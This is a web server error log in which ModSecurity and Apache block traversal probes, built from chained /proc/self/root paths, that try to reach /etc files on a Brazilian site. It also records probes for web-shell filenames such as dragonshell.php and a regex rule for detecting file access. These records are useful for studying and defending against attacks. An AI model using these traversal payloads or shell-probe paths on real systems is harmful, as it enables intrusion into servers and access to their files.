https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:55.558826 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.243.203:45196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0O1ajLEzk2WiQ-10XTgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:58.065232 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:45210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0Pv9ocpUE4ed4uDz0qAAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:59.378796 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.243.203:45220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0P5qj1wV0Si-Okef0yQAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:07.491167 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:45666] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0R6TCbgAP5jq5TegwjgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:08.807904 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:45682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0SHjZBu2q05ozVU9d0QAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:10.167379 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:35660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0SnjZBu2q05ozVU9d1AAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:20.314873 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:35674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0U5qj1wV0Si-Okef02AAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:29.807579 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:60258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0XXjZBu2q05ozVU9d3gAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:50.013037 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:38840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0cpqj1wV0Si-Okef07wAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:48:51.251627 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:37616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0c6QpVkWug9HeOt87LAAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:01.500680 2026] [:error] [pid 14895:tid 140411641214720] [client 74.7.243.203:37624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0fVajLEzk2WiQ-10XbAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:04.593312 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:38488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0gHjZBu2q05ozVU9d4gAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:05.883802 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:38494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0gbysWC90G-1nBrBKXQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:13.864797 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:38500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0idSswJuvopo3lOhk5gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:18.766340 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:51936] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg0jtSswJuvopo3lOhk6wAAAIo"]
[Mon Mar 16 13:49:18.880795 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:39184] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0jtSswJuvopo3lOhk7AAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:49:58.935265 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:33220] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0to6lpbStxTqkSktyggAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:50:01.677603 2026] [access_compat:error] [pid 21805:tid 140411582465792] [client 20.151.2.242:59528] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fyiiz.php
[Mon Mar 16 13:50:01.850914 2026] [access_compat:error] [pid 21805:tid 140411683178240] [client 20.151.2.242:59528] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/web.php
[Mon Mar 16 13:50:02.052481 2026] [access_compat:error] [pid 21805:tid 140411540502272] [client 20.151.2.242:59528] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/dragonshell.php
[Mon Mar 16 13:50:02.231050 2026] [access_compat:error] [pid 21805:tid 140411599251200] [client 20.151.2.242:59528] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/to.php
[Mon Mar 16 13:50:02.391608 2026] [access_compat:error] [pid 21805:tid 140411733534464] [client 20.151.2.242:59528] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xc0252.php
[Mon Mar 16 13:50:03.078725 2026] [access_compat:error] [pid 15568:tid 140411574073088] [client 20.151.2.242:59602] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/595.php
[Mon Mar 16 13:50:03.122932 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:46258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0u6QpVkWug9HeOt87XQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:50:03.227492 2026] [access_compat:error] [pid 15568:tid 140411725141760] [client 20.151.2.242:59602] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/webadmin.php
[Mon Mar 16 13:50:03.356773 2026] [access_compat:error] [pid 15568:tid 140411733534464] [client 20.151.2.242:59602] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/x1.php
[Mon Mar 16 13:50:03.487897 2026] [access_compat:error] [pid 15568:tid 140411540502272] [client 20.151.2.242:59602] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/0.php
[Mon Mar 16 13:50:03.630484 2026] [access_compat:error] [pid 15568:tid 140411691570944] [client 20.151.2.242:59602] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/scbpb.php
[Mon Mar 16 13:50:03.935100 2026] [access_compat:error] [pid 10772:tid 140411666392832] [client 20.151.2.242:59620] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/yaiid.php
[Mon Mar 16 13:50:04.843216 2026] [access_compat:error] [pid 14895:tid 140411725141760] [client 20.151.2.242:59638] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ta0ol.php
[Mon Mar 16 13:50:04.982557 2026] [access_compat:error] [pid 14895:tid 140411574073088] [client 20.151.2.242:59638] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/v3.php
[Mon Mar 16 13:50:05.128798 2026] [access_compat:error] [pid 14895:tid 140411658000128] [client 20.151.2.242:59638] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xvs.php
[Mon Mar 16 13:50:05.282652 2026] [access_compat:error] [pid 14895:tid 140411649607424] [client 20.151.2.242:59644] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/fss.php
[Mon Mar 16 13:50:05.756338 2026] [access_compat:error] [pid 21805:tid 140411565680384] [client 20.151.2.242:59658] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xwx1.php
[Mon Mar 16 13:50:05.890767 2026] [access_compat:error] [pid 14895:tid 140411674785536] [client 20.151.2.242:59662] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/utky.php
[Mon Mar 16 13:50:06.037332 2026] [access_compat:error] [pid 14895:tid 140411590858496] [client 20.151.2.242:59662] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ass.php
[Mon Mar 16 13:50:06.179106 2026] [access_compat:error] [pid 14895:tid 140411616036608] [client 20.151.2.242:59662] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/gkl.php
[Mon Mar 16 13:50:06.316655 2026] [access_compat:error] [pid 21533:tid 140411548894976] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wps.php
[Mon Mar 16 13:50:06.448958 2026] [access_compat:error] [pid 21533:tid 140411725141760] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/flower.php
[Mon Mar 16 13:50:06.582310 2026] [access_compat:error] [pid 21533:tid 140411540502272] [client 20.151.2.242:59668] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/yifsx.php
[Mon Mar 16 13:50:06.629095 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:56034] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0vv9ocpUE4ed4uDz0zgAAAhM"], referer: 